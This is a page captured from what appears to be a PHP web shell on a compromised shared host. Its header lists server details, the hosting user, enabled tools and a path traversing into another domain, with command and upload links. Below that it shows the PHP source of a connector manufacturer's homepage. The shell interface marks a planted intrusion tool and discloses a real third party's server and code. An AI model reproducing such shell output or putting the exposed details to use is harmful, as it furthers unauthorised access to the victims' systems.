Server IP : 2a02:4780:11:1361:0:bf7:7935:10 / Your IP : 3.142.201.190 Web Server : LiteSpeed System : Linux in-mum-web1261.main-hosting.eu 4.18.0-553.37.1.lve.el8.x86_64 #1 SMP Mon Feb 10 22:45:17 UTC 2025 x86_64 User : u200767797 ( 200767797) PHP Version : 8.1.31 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : ON Directory (0755) : /home/u200767797/domains/../domains/bantoremedies.com/../iiienterprise.com/public_html/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!DOCTYPE html> <html lang="en"> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <head> <!-- Title --> <title>III ENTERPRISES</title> <!-- Required Meta Tags Always Come First --> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <!-- Favicon --> <link rel="shortcut icon" href="assets/img/favicon.jpg"> <!-- Google Fonts --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&display=swap" rel="stylesheet"> <!-- CSS Implementing Plugins --> <link rel="stylesheet" href="assets/vendor/font-awesome/css/fontawesome-all.min.css"> <link rel="stylesheet" href="assets/css/font-electro.css"> <link rel="stylesheet" href="assets/vendor/animate.css/animate.min.css"> <link rel="stylesheet" href="assets/vendor/hs-megamenu/src/hs.megamenu.css"> <link rel="stylesheet" href="assets/vendor/malihu-custom-scrollbar-plugin/jquery.mCustomScrollbar.css"> <link rel="stylesheet" href="assets/vendor/fancybox/jquery.fancybox.css"> <link rel="stylesheet" href="assets/vendor/slick-carousel/slick/slick.css"> <link rel="stylesheet" href="assets/vendor/bootstrap-select/dist/css/bootstrap-select.min.css"> <!-- CSS Electro Template --> <link rel="stylesheet" href="assets/css/theme.css"> <style> .prodcut-price p{font-size:14px;} </style> </head> <body> <?php include 'header.php';?> <!-- ========== MAIN CONTENT ========== --> <main id="content" role="main"> <!-- Slider Section --> <div class="mb-5"> <div class="bg-img-hero" style="background-image: url(assets/img/bg.jpg);"> <div class="container min-height-420 overflow-hidden"> <div class="js-slick-carousel u-slick" data-pagi-classes="text-center position-absolute right-0 bottom-0 left-0 u-slick__pagination u-slick__pagination--long justify-content-start mb-3 mb-md-4 offset-xl-3 pl-2 pb-1"> <?php include('connection.php'); $cate=mysqli_query($con,"SELECT * FROM `slider` order by id desc"); while($row=mysqli_fetch_array($cate)){ $i++; $id=$row['id']; $image=$row['image']; $title=$row['title']; $image = $base.'/admin/dist/include/images/'.$image; ?> <div class="js-slide bg-img-hero-center"> <div class="row min-height-420 py-7 py-md-0"> <div class="offset-xl-3 col-xl-4 col-12 mt-md-8 slider-text"> <h1 class="font-size-45 text-lh-57" data-scs-animation-in="fadeInUp"> <?php echo $title ?> </h1> <p>WE Export Our Products To Various Counteries - Our highly skilled and experienced team of professionals is recruited on the basis of their ability to perform and willingness to work hard</p> <a href="#" class="btn-primary transition-3d-hover rounded-lg font-weight-normal py-2 px-md-7 px-3 font-size-16"> Enquire Now </a> </div> <div class="col-xl-5 col-12 d-flex align-items-center" data-scs-animation-in="zoomIn" data-scs-animation-delay="500"> <img class="img-fluid" src="<?php echo $image ?>" alt="Image Description" width="100%"> </div> </div> </div> <?php } ?> </div> </div> </div> </div> <!-- End Slider Section --> <div class="container"> <!-- Banner --> <div class="mb-5"> <div class="row"> <?php include('connection.php'); $cate=mysqli_query($con,"SELECT * FROM `categories` GROUP BY `category` order by id desc"); $a=0; while($row=mysqli_fetch_array($cate)){ $name=$row['category']; $image=$row['image']; $id=$row['id']; $a++; $image = $base.'/admin/dist/include/uploads/'.$image; ?> <div class="col-md-6 mb-4 mb-xl-0 col-xl-3"> <div class="catnew"> <a href="product-page.php?cat=<?php echo $name ?>" class="d-black text-gray-90"> <div class="min-height-132 py-1 d-flex bg-gray-1 align-items-center"> <div class="col-6 col-xl-5 col-wd-6 pr-0"> <img class="img-fluid" src="<?php echo $image ?>" alt="Image Description"> </div> <div class="col-6 col-xl-7 col-wd-6"> <div class="mb-2 pb-1 font-size-22"> <strong><?php echo $name ?></strong> </div> </div> </div> </a> </div> </div> <?php } ?> </div> </div> </div> <!-- End Banner --> <!-- Deals-and-tabs --> <!-- Products-4-1-4 --> <div class="products-group-4-1-4 space-1 bg-gray-7"> <div class="container"> <!-- Nav Classic --> <h2>Banana Plugs</h2> <div class="row no-gutters"> <?php include('connection.php'); $cate=mysqli_query($con,"SELECT * FROM `products` WHERE `category` = 'Banana Plugs' order by id desc LIMIT 9"); while($row=mysqli_fetch_array($cate)){ $id=$row['id']; $name=$row['name']; $description=$row['description']; $image=$row['image']; $image = $base.'/admin/dist/include/uploads/'.$image; ?> <div class="col-md-3 col-wd-4 d-md-flex d-wd-block"> <div class="product-item__outer h-100 w-100 prodcut-box-shadow"> <div class="product-item__inner bg-white p-3"> <div class="product-item__body pb-xl-2"> <div class="mb-2"> <a href="product-detail.php?id=<?php echo $id ?>" class="d-block text-center"><img class="img-fluid" src="<?php echo $image ?>" alt="Image Description"></a> </div> <div class="flex-center-between mb-1"> <div class="prodcut-price"> <h5 class="mb-1 product-item__title"><a href="product-detail.php?id=<?php echo $id ?>" class="text-blue font-weight-bold"><?php echo $name ?></a></h5> <div class="prodcut-bton"> <a href="product-detail.php?id=<?php echo $id ?>">View Details</a> </div> </div> </div> </div> </div> </div> </div> <?php } ?> </div> </div> </div> <main id="content" role="main"> <div class="bg-img-hero" style="background-image: url(assets/img/1920x600/img1.jpg);"> <div class="container"> <div class="flex-content-center max-width-620-lg flex-column mx-auto text-center"> <h1 class="h1 font-weight-bold">Welcome To III Enterprises</h1> <p class="text-gray-39 font-size-default text-lh-default">We specialize in providing high-quality banana terminals, sockets, and plugs for all your electrical needs. Our products are designed to provide reliable and consistent performance, making them ideal for a wide range of applications. We are a leading supplier of high-quality banana terminals, sockets, and plugs for a wide range of applications. Our products are used in industries such as electronics, telecommunications, instrumentation, and audio equipment. With our extensive range of products, we can provide solutions for all your banana terminal, socket, and plug needs.</p> </div> </div> </div> <div class="container"> <div class="row"> <div class="col-lg-4 col-md-6 col-sm-6 col-12"> <div class="features-box" style="background-image: url(assets/img/mechanical-design-01.jpg);"> <div class="features-box-content"> <h3>OUR MISSION</h3> <p>Our mission at III ENTERPRISES is to provide our customers with high-quality electrical connectivity solutions that meet their unique needs, exceed their expectations, and contribute to their success. Providing superior products:</p> </div> </div> </div> <div class="col-lg-4 col-md-6 col-sm-6 col-12"> <div class="features-box" style="background-image: url(assets/img/project.jpg);"> <div class="features-box-content"> <h3>OUR VISION</h3> <p>Our vision at III ENTERPRISES is to be a leading provider of high-quality and innovative electrical connectivity solutions. We strive to meet the evolving needs of our customers by continually investing in research and development,</p> </div> </div> </div> <div class="col-lg-4 col-md-6 col-sm-6 col-12"> <div class="features-box" style="background-image: url(assets/img/repair.jpg);"> <div class="features-box-content"> <h3>WHY CHOOSE US</h3> <p>We, at III ENTERPRISES are among the prominent manufacturers and supplier of the finest quality of Testing & Measuring Electronic Components. To maintain this reputation,we engage in the utilization of high grade raw materials.</p> </div> </div> </div> </div> </div> </main> <!-- End Products-4-1-4 --> <div class="container"> <!-- Prodcut-cards-carousel --> <div class="space-top-2"> <div class="d-flex justify-content-between border-bottom border-color-1 flex-md-nowrap flex-wrap border-sm-bottom-0"> <h3 class="section-title mb-0 pb-2 font-size-22">Banana Socket</h3> </div> <ul class="row"> <?php include('connection.php'); $cate=mysqli_query($con,"SELECT * FROM `products` WHERE `category` = 'Banana Socket' order by id desc LIMIT 8"); while($row=mysqli_fetch_array($cate)){ $id=$row['id']; $name=$row['name']; $description=$row['description']; $image=$row['image']; $image = $base.'/admin/dist/include/uploads/'.$image; $description = substr(strip_tags($description),0,100).'...'; ?> <li class="col-wd-3 col-md-4 product-item"> <div class="product-item__outer h-100"> <div class="product-item__inner p-md-3 row no-gutters"> <div class="col col-lg-auto product-media-left"> <a href="product-detail.php?id=<?php echo $id ?>" class="max-width-150 d-block"><img class="img-fluid" src="<?php echo $image ?>" alt="Image Description"></a> </div> <div class="col product-item__body pl-2 pl-lg-3 mr-xl-2 mr-wd-1"> <div class="mb-4"> <h5 class="product-item__title"><a href="product-detail.php?id=<?php echo $id ?>" class="text-blue font-weight-bold"><?php echo $name ?></a></h5> <p class="font-size-14"><?php echo $description ?></p> <div class="prodcut-boton"> <a href="">Enquire Now</a> </div> </div> </div> </div> </div> </li> <?php } ?> </ul> </div> </div> <!-- End Prodcut-cards-carousel --> <!-- Full banner --> <article class="card mb-13 border-0"> <div class="container"> <div class="row"> <div class="col-lg-4 mb-5 mb-lg-0"> <img class="img-fluid min-height-250 object-fit-cover" src="https://transpacificfinance.com.au/wp-content/uploads/2022/08/Export-Import-Finance.jpg" alt="Image Description" width="100%"> </div> <div class="col-lg-8"> <div class="card-body p-0"> <h2 class="mb-3">WE Export Our Products To Various Counteries</h2> <p>Our highly skilled and experienced team of professionals is recruited on the basis of their ability to perform and willingness to work hard. These professionals, in the most efficient manner, help us in the maximization of our productivity and attain several of the firm’s predefined goals and objectives. For reasons of attaining smoother management of the team’s operations, the professionals have been parted into several highly operational units. Further, to keep them at par with the ever changing market, we provide them with regular training sessions. </p> <div class="flex-horizontal-center"> <a href="#" class="btn btn-soft-secondary-w mb-md-0 font-weight-normal px-5 px-md-4 px-lg-5">Read More</a> </div> </div> </div> </div> </div> </article> <!-- End Full banner --> <!-- Recently viewed --> <div class="mb-6"> <div class="container"> <div class="position-relative"> <div class="border-bottom border-color-1 mb-2"> <h3 class="section-title mb-0 pb-2 font-size-22">Banana Patch Cords</h3> </div> <div class="js-slick-carousel u-slick position-static overflow-hidden u-slick-overflow-visble pb-7 pt-2 px-1" data-pagi-classes="text-center right-0 bottom-1 left-0 u-slick__pagination u-slick__pagination--long mb-0 z-index-n1 mt-3 mt-md-0" data-slides-show="7" data-slides-scroll="1" data-arrows-classes="position-absolute top-0 font-size-17 u-slick__arrow-normal top-10" data-arrow-left-classes="fa fa-angle-left right-1" data-arrow-right-classes="fa fa-angle-right right-0" data-responsive='[{ "breakpoint": 1400, "settings": { "slidesToShow": 4 } }, { "breakpoint": 1200, "settings": { "slidesToShow": 4 } }, { "breakpoint": 992, "settings": { "slidesToShow": 3 } }, { "breakpoint": 768, "settings": { "slidesToShow": 2 } }, { "breakpoint": 554, "settings": { "slidesToShow": 2 } }]'> <?php include('connection.php'); $cate=mysqli_query($con,"SELECT * FROM `products` WHERE `category` = 'Banana Patch Cords' order by id desc LIMIT 8"); while($row=mysqli_fetch_array($cate)){ $id=$row['id']; $name=$row['name']; $description=$row['description']; $image=$row['image']; $image = $base.'/admin/dist/include/uploads/'.$image; ?> <div class="js-slide products-group"> <div class="product-item"> <div class="product-item__outer h-100"> <div class="product-item__inner px-wd-4 p-2 p-md-3"> <div class="product-item__body pb-xl-2"> <div class="mb-2"> <a href="product-detail.php?id=<?php echo $id ?>" class="d-block text-center"><img class="img-fluid" src="<?php echo $image ?>" alt="Image Description"></a> </div> <div class="flex-center-between mb-1"> <div class="prodcut-price"> <h5 class="mb-1 product-item__title"><a href="product-detail.php?id=<?php echo $id ?>" class="text-blue font-weight-bold"><?php echo $name ?></a></h5> <p class="font-size-14"><?php echo substr(strip_tags($description),0,100) ?>...</p> <div class="enqr"> <a href="">Enquire Now</a> </div> </div> </div> </div> </div> </div> </div> </div> <?php } ?> </div> </div> </div> <!-- End Recently viewed --> <!-- Brand Carousel --> <div class="mb-8"> <div class="py-2 border-top border-bottom"> <div class="client-inf"> <h2>Our Clients</h2> </div> <div class="js-slick-carousel u-slick my-1" data-slides-show="5" data-slides-scroll="1" data-arrows-classes="d-none d-lg-inline-block u-slick__arrow-normal u-slick__arrow-centered--y" data-arrow-left-classes="fa fa-angle-left u-slick__arrow-classic-inner--left z-index-9" data-arrow-right-classes="fa fa-angle-right u-slick__arrow-classic-inner--right" data-responsive='[{ "breakpoint": 992, "settings": { "slidesToShow": 2 } }, { "breakpoint": 768, "settings": { "slidesToShow": 1 } }, { "breakpoint": 554, "settings": { "slidesToShow": 1 } }]'> <div class="js-slide"> <img class="img-fluid m-auto" src="assets/img/logo-1.png" alt="Image Description"> </div> <div class="js-slide"> <img class="img-fluid m-auto" src="assets/img/logo-2.png" alt="Image Description"> </div> <div class="js-slide"> <img class="img-fluid m-auto" src="assets/img/logo-3.png" alt="Image Description"> </div> <div class="js-slide"> <img class="img-fluid m-auto" src="assets/img/logo-4.png" alt="Image Description"> </div> <div class="js-slide"> <img class="img-fluid m-auto" src="assets/img/logo-5.png" alt="Image Description"> </div> <div class="js-slide"> <img class="img-fluid m-auto" src="assets/img/logo-6.png" alt="Image Description"> </div> <div class="js-slide"> <img class="img-fluid m-auto" src="assets/img/logo-7.png" alt="Image Description"> </div> <div class="js-slide"> <img class="img-fluid m-auto" src="assets/img/logo-8.png" alt="Image Description"> </div> </div> </div> </div> <!-- End Brand Carousel --> </div> </main> <!-- ========== END MAIN CONTENT ========== --> <!-- Footer-top-widget --> <div class="container d-none d-lg-block mb-3"> <div class="row"> <div class="col-wd-3 col-lg-6"> <div class="widget-column"> <div class="border-bottom border-color-1 mb-5"> <h3 class="section-title section-title__sm mb-0 pb-2 font-size-18">Crocodile Clips</h3> </div> <ul class="list-unstyled products-group"> <?php include('connection.php'); $cate=mysqli_query($con,"SELECT * FROM `products` WHERE `category` = 'Crocodile Clips' order by id desc LIMIT 8"); while($row=mysqli_fetch_array($cate)){ $id=$row['id']; $name=$row['name']; $description=$row['description']; $image=$row['image']; $image = $base.'/admin/dist/include/uploads/'.$image; ?> <li class="product-item product-item__list row no-gutters mb-6 remove-divider"> <div class="col-auto"> <a href="product-detail.php?id=<?php echo $id ?>" class="d-block max-width-150 text-center"><img class="img-fluid" src="<?php echo $image ?>" alt="Image Description"></a> </div> <div class="col pl-4 d-flex flex-column"> <h5 class="product-item__title mb-0"><a href="product-detail.php?id=<?php echo $id ?>" class="text-blue font-weight-bold"><?php echo $name ?></a></h5> <p class="font-size-14 mb-1"><?php echo substr(strip_tags($description),0,100) ?>...</p> <div class="enqri"> <a href="">Enquire Now</a> </div> </div> </li> <?php } ?> <!-- <li class="product-item product-item__list row no-gutters mb-6 remove-divider">--> <!-- <div class="col-auto">--> <!-- <a href="#" class="d-block max-width-150 text-center"><img class="img-fluid" src="assets/img/switch-80.jpg" alt="Image Description"></a>--> <!-- </div>--> <!-- <div class="col pl-4 d-flex flex-column">--> <!-- <h5 class="product-item__title mb-0"><a href="#" class="text-blue font-weight-bold">Bnc to Testpin</a></h5>--> <!--<p class="font-size-14 mb-1">Lorem Ipsum is simply dummy text of the printing and typesetting industry</p>--> <!-- <div class="enqri">--> <!-- <a href="">Enquire Now</a> --> <!-- </div>--> <!-- </div>--> <!-- </li>--> <!-- <li class="product-item product-item__list row no-gutters mb-6 remove-divider">--> <!-- <div class="col-auto">--> <!-- <a href="#" class="d-block max-width-150 text-center"><img class="img-fluid" src="assets/img/switch-73.jpg" alt="Image Description"></a>--> <!-- </div>--> <!-- <div class="col pl-4 d-flex flex-column">--> <!-- <h5 class="product-item__title mb-0"><a href="#" class="text-blue font-weight-bold">Crocodile Clips</a></h5>--> <!--<p class="font-size-14 mb-1">Lorem Ipsum is simply dummy text of the printing and typesetting industry</p>--> <!-- <div class="enqri">--> <!-- <a href="">Enquire Now</a> --> <!-- </div> --> <!-- </div>--> <!-- </li>--> </ul> </div> </div> <div class="col-wd-3 col-lg-6"> <div class="border-bottom border-color-1 mb-5"> <h3 class="section-title section-title__sm mb-0 pb-2 font-size-18">Knobs</h3> </div> <ul class="list-unstyled products-group"> <?php include('connection.php'); $cate=mysqli_query($con,"SELECT * FROM `products` WHERE `category` = 'Knobs' order by id desc LIMIT 8"); while($row=mysqli_fetch_array($cate)){ $id=$row['id']; $name=$row['name']; $description=$row['description']; $image=$row['image']; $image = $base.'/admin/dist/include/uploads/'.$image; ?> <li class="product-item product-item__list row no-gutters mb-6 remove-divider"> <div class="col-auto"> <a href="product-detail.php?id=<?php echo $id ?>" class="d-block max-width-150 text-center"><img class="img-fluid" src="<?php echo $image ?>" alt="Image Description"></a> </div> <div class="col pl-4 d-flex flex-column"> <h5 class="product-item__title mb-0"><a href="product-detail.php?id=<?php echo $id ?>" class="text-blue font-weight-bold"><?php echo $name ?></a></h5> <p class="font-size-14 mb-1"><?php echo substr(strip_tags($description),0,100) ?>...</p> <div class="enqri"> <a href="">Enquire Now</a> </div> </div> </li> <?php } ?> <!-- <li class="product-item product-item__list row no-gutters mb-6 remove-divider">--> <!-- <div class="col-auto">--> <!-- <a href="#" class="d-block max-width-150 text-center"><img class="img-fluid" src="assets/img/switch-75.jpg" alt="Image Description"></a>--> <!-- </div>--> <!-- <div class="col pl-4 d-flex flex-column">--> <!-- <h5 class="product-item__title mb-0"><a href="#" class="text-blue font-weight-bold">Pointer knobs</a></h5>--> <!--<p class="font-size-14 mb-1">Lorem Ipsum is simply dummy text of the printing and typesetting industry</p>--> <!-- <div class="enqri">--> <!-- <a href="">Enquire Now</a> --> <!-- </div>--> <!-- </div>--> <!-- </li>--> <!-- <li class="product-item product-item__list row no-gutters mb-6 remove-divider">--> <!-- <div class="col-auto">--> <!-- <a href="#" class="d-block max-width-150 text-center"><img class="img-fluid" src="assets/img/switch-76.jpg" alt="Image Description"></a>--> <!-- </div>--> <!-- <div class="col pl-4 d-flex flex-column">--> <!-- <h5 class="product-item__title mb-0"><a href="#" class="text-blue font-weight-bold">Round Knobs</a></h5>--> <!--<p class="font-size-14 mb-1">Lorem Ipsum is simply dummy text of the printing and typesetting industry</p>--> <!-- <div class="enqri">--> <!-- <a href="">Enquire Now</a> --> <!-- </div>--> <!-- </div>--> <!-- </li>--> </ul> </div> </div> </div> <!-- End Footer-top-widget --> <?php include 'footer.php';?> <!-- ========== SECONDARY CONTENTS ========== --> <!-- ========== END SECONDARY CONTENTS ========== --> <!-- Go to Top --> <a class="js-go-to u-go-to" href="#" data-position='{"bottom": 15, "right": 15 }' data-type="fixed" data-offset-top="400" data-compensation="#header" data-show-effect="slideInUp" data-hide-effect="slideOutDown"> <span class="fas fa-arrow-up u-go-to__inner"></span> </a> <!-- End Go to Top --> <!-- JS Global Compulsory --> <script src="assets/vendor/jquery/dist/jquery.min.js"></script> <script src="assets/vendor/jquery-migrate/dist/jquery-migrate.min.js"></script> <script src="assets/vendor/popper.js/dist/umd/popper.min.js"></script> <script src="assets/vendor/bootstrap/bootstrap.min.js"></script> <!-- JS Implementing Plugins --> <script src="assets/vendor/hs-megamenu/src/hs.megamenu.js"></script> <script src="assets/vendor/malihu-custom-scrollbar-plugin/jquery.mCustomScrollbar.concat.min.js"></script> <script src="assets/vendor/jquery-validation/dist/jquery.validate.min.js"></script> <script src="assets/vendor/slick-carousel/slick/slick.js"></script> <!-- JS Electro --> <script src="assets/js/hs.core.js"></script> <script src="assets/js/components/hs.countdown.js"></script> <script src="assets/js/components/hs.header.js"></script> <script src="assets/js/components/hs.unfold.js"></script> <script src="assets/js/components/hs.focus-state.js"></script> <script src="assets/js/components/hs.malihu-scrollbar.js"></script> <script src="assets/js/components/hs.validation.js"></script> <script src="assets/js/components/hs.fancybox.js"></script> <script src="assets/js/components/hs.onscroll-animation.js"></script> <script src="assets/js/components/hs.slick-carousel.js"></script> <script src="assets/js/components/hs.show-animation.js"></script> <!-- JS Plugins Init. --> <script> $(window).on('load', function () { // initialization of HSMegaMenu component $('.js-mega-menu').HSMegaMenu({ event: 'hover', direction: 'horizontal', pageContainer: $('.container'), breakpoint: 767.98, hideTimeOut: 0 }); // initialization of svg injector module $.HSCore.components.HSSVGIngector.init('.js-svg-injector'); }); $(document).on('ready', function () { // initialization of header $.HSCore.components.HSHeader.init($('#header')); // initialization of animation $.HSCore.components.HSOnScrollAnimation.init('[data-animation]'); // initialization of unfold component $.HSCore.components.HSUnfold.init($('[data-unfold-target]'), { afterOpen: function () { $(this).find('input[type="search"]').focus(); } }); // initialization of popups $.HSCore.components.HSFancyBox.init('.js-fancybox'); // initialization of countdowns var countdowns = $.HSCore.components.HSCountdown.init('.js-countdown', { yearsElSelector: '.js-cd-years', monthsElSelector: '.js-cd-months', daysElSelector: '.js-cd-days', hoursElSelector: '.js-cd-hours', minutesElSelector: '.js-cd-minutes', secondsElSelector: '.js-cd-seconds' }); // initialization of malihu scrollbar $.HSCore.components.HSMalihuScrollBar.init($('.js-scrollbar')); // initialization of forms $.HSCore.components.HSFocusState.init(); // initialization of form validation $.HSCore.components.HSValidation.init('.js-validate', { rules: { confirmPassword: { equalTo: '#signupPassword' } } }); // initialization of show animations $.HSCore.components.HSShowAnimation.init('.js-animation-link'); // initialization of fancybox $.HSCore.components.HSFancyBox.init('.js-fancybox'); // initialization of slick carousel $.HSCore.components.HSSlickCarousel.init('.js-slick-carousel'); // initialization of go to $.HSCore.components.HSGoTo.init('.js-go-to'); // initialization of hamburgers $.HSCore.components.HSHamburgers.init('#hamburgerTrigger'); // initialization of unfold component $.HSCore.components.HSUnfold.init($('[data-unfold-target]'), { beforeClose: function () { $('#hamburgerTrigger').removeClass('is-active'); }, afterClose: function() { $('#headerSidebarList .collapse.show').collapse('hide'); } }); $('#headerSidebarList [data-toggle="collapse"]').on('click', function (e) { e.preventDefault(); var target = $(this).data('target'); if($(this).attr('aria-expanded') === "true") { $(target).collapse('hide'); } else { $(target).collapse('show'); } }); // initialization of unfold component $.HSCore.components.HSUnfold.init($('[data-unfold-target]')); // initialization of select picker $.HSCore.components.HSSelectPicker.init('.js-select'); }); </script> </body> </html>